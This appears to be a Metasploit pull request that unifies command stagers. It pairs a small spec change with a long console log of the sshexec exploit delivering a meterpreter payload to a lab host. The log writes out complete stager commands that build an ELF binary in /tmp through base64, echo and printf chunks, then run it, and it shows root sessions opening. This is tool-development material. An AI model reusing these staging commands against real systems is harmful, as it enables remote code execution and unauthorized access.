### PR TITLE
Cmd Stager Unification Update

### DIFF
--- a/spec/lib/msf/core/exploit/cmdstager_spec.rb
+++ b/spec/lib/msf/core/exploit/cmdstager_spec.rb
@@ -87,7 +87,7 @@ describe Msf::Exploit::CmdStager do
         end
 
         it "raises ArgumentError" do
-          expect { subject.select_cmdstager(:flavor => flavor) }.to raise_error(ArgumentError, /The CMD Stager selected isn't compatible with the target/)
+          expect { subject.select_cmdstager(:flavor => flavor) }.to raise_error(ArgumentError, /The CMD Stager '\w+' isn't compatible with the target/)
         end
       end
     end


### PR DESCRIPTION
This PR is an updated replacement to #2.  It includes all the improvements and work from @jvazquez-r7. 

At Juan's request, this should be reviewed and given the A-OK by @jlee-r7.
#### Background:

The idea behind this is to unify the cmd stagers into one that can allow a flavor to be selected at run time either explicitely by the module or guessed based on the target criteria.

Demonstration of using different stagers with sshexec:

```
msf4-git (S:0 J:0)  exploit(sshexec) > show options 

Module options (exploit/multi/ssh/sshexec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  YAYMSF           yes       The password to authenticate with.
   RHOST     192.168.90.124   yes       The target address
   RPORT     22               yes       The target port
   USERNAME  root             yes       The user to authenticate as.


Payload options (linux/x86/meterpreter/bind_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LPORT         4444             yes       The listen port
   RHOST         192.168.90.124   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf4-git (S:0 J:0)  exploit(sshexec) > exploit

[*] Started bind handler
[*] 192.168.90.124:22 - Sending stager...
[*] Executing echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjNAAAARgEAAAcAAAAAEAAAvrrcEZTZxtl0JPRfKcmxGDF3FIPHBAN3EFgpe5bEH/wTNOv7KnSkBYD0r3hCbZ2Ey43yiisEEeyq9dYBYXnnOo2aW/4hNl6JJ3Y4RCctmwRA0yO4zLkz67y01WFbntj2cv1TkLmB1+0kCIYJZIq6pHo6vwUCsx9q4g==>>/tmp/jojZd.b64
[*] Command Stager progress -  41.38% done (300/725 bytes)
[*] Executing ((which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > /tmp/mQAGV.bin < /tmp/jojZd.b64 ; chmod +x /tmp/mQAGV.bin ; /tmp/mQAGV.bin ; rm -f /tmp/mQAGV.bin ; rm -f /tmp/jojZd.b64
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1228800 bytes) to 192.168.90.124
[*] Command Stager progress - 100.00% done (725/725 bytes)
[*] Meterpreter session 1 opened (192.168.90.229:33423 -> 192.168.90.124:4444) at 2014-02-10 09:44:03 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.90.124 - Meterpreter session 1 closed.  Reason: User exit
msf4-git (S:0 J:0)  exploit(sshexec) > set CMDSTAGER::FLAVOR echo
CMDSTAGER::FLAVOR => echo
msf4-git (S:0 J:0)  exploit(sshexec) > exploit

[*] Started bind handler
[*] 192.168.90.124:22 - Sending stager...
[*] Executing echo -en \\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00\\x00\\x54\\x80\\x04\\x08\\x34\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\x00\\x20\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x04\\x08\\x00\\x80\\x04\\x08\\xcd\\x00\\x00\\x00\\x46\\x01\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\xdb\\xd8\\xba\\xf3\\x3e\\x03\\x8a\\xd9\\x74\\x24\\xf4>>/tmp/Yjeip
[*] Command Stager progress -  43.43% done (496/1142 bytes)
[*] Executing echo -en \\x5e\\x31\\xc9\\xb1\\x18\\x83\\xc6\\x04\\x31\\x56\\x15\\x03\\x56\\x15\\x11\\xcb\\x69\\x88\\x8d\\xf9\\xee\\x09\\xed\\x76\\xe9\\x20\\x2d\\xc6\\xf4\\x8f\\x2d\\x4d\\x8a\\x57\\xb4\\x20\\x73\\xd1\\xc6\\x54\\x7c\\x21\\x4f\\xb7\\x1a\\xa0\\xac\\x38\\x13\\x6f\\xb2\\x08\\x08\\x87\\x51\\x39\\xed\\x3b\\xff\\xbc\\x78\\x5a\\x4f\\xa6\\xb7\\x1d\\xf4\\x79\\x1a\\x76\\x08\\x86\\x8b\\xda\\x66\\x96\\xfa\\xb2\\xff\\x77\\x96\\x54\\xa7\\xba\\xe7\\x48\\xb4\\xf5\\x8e\\xa7\\xba\\xb5\\xfe\\x5e\\x33>>/tmp/Yjeip
[*] Command Stager progress -  86.87% done (992/1142 bytes)
[*] Executing echo -en \\x68\\xfb\\x53\\xc3\\x18\\xb5\\x60\\x73\\x1d\\x77\\xf8\\xfa\\xfd\\x78\\x18>>/tmp/Yjeip ; chmod +x /tmp/Yjeip ; /tmp/Yjeip ; rm -f /tmp/Yjeip
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1228800 bytes) to 192.168.90.124
[*] Command Stager progress - 100.00% done (1142/1142 bytes)
[*] Meterpreter session 2 opened (192.168.90.229:45747 -> 192.168.90.124:4444) at 2014-02-10 09:44:19 -0500

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.90.124 - Meterpreter session 2 closed.  Reason: User exit
msf4-git (S:0 J:0)  exploit(sshexec) > set CMDSTAGER::FLAVOR printf 
CMDSTAGER::FLAVOR => printf
msf4-git (S:0 J:0)  exploit(sshexec) > exploit

[*] Started bind handler
[*] 192.168.90.124:22 - Sending stager...
[*] Executing printf '\177\105\114\106\1\1\1\0\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\124\200\4\10\64\0\0\0\0\0\0\0\0\0\0\0\64\0\40\0\1\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\200\4\10\0\200\4\10\315\0\0\0\106\1\0\0\7\0\0\0\0\20\0\0\332\303\331\164\44\364\137\270\344\42\114\137\61\311\261\30\61\107\31\3\107\31\203\357\374\6\327\46\135\236\325\67\344\336\222\61\326\36\352\77\325\36\141\75\275\207\304\272\204\267\70\305\366\76\333\243\167\243\34\334\265\243\54\307\261\100\35\264\156\354\240\263\160\100\302\16\362'>>/tmp/jwSEW
[*] Command Stager progress -  67.66% done (500/739 bytes)
[*] Executing printf '\373\125\303\233\371\151\362\7\227\171\245\347\356\233\57\156\250\226\60\277\253\231\127\215\253\231\47\153\42\114\114\271\264\374\372\115\4\1\316\316\355\331\57\57'>>/tmp/jwSEW ; chmod +x /tmp/jwSEW ; /tmp/jwSEW ; rm -f /tmp/jwSEW
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1228800 bytes) to 192.168.90.124
[*] Command Stager progress - 100.00% done (739/739 bytes)
[*] Meterpreter session 3 opened (192.168.90.229:41106 -> 192.168.90.124:4444) at 2014-02-10 09:44:29 -0500

meterpreter >
```
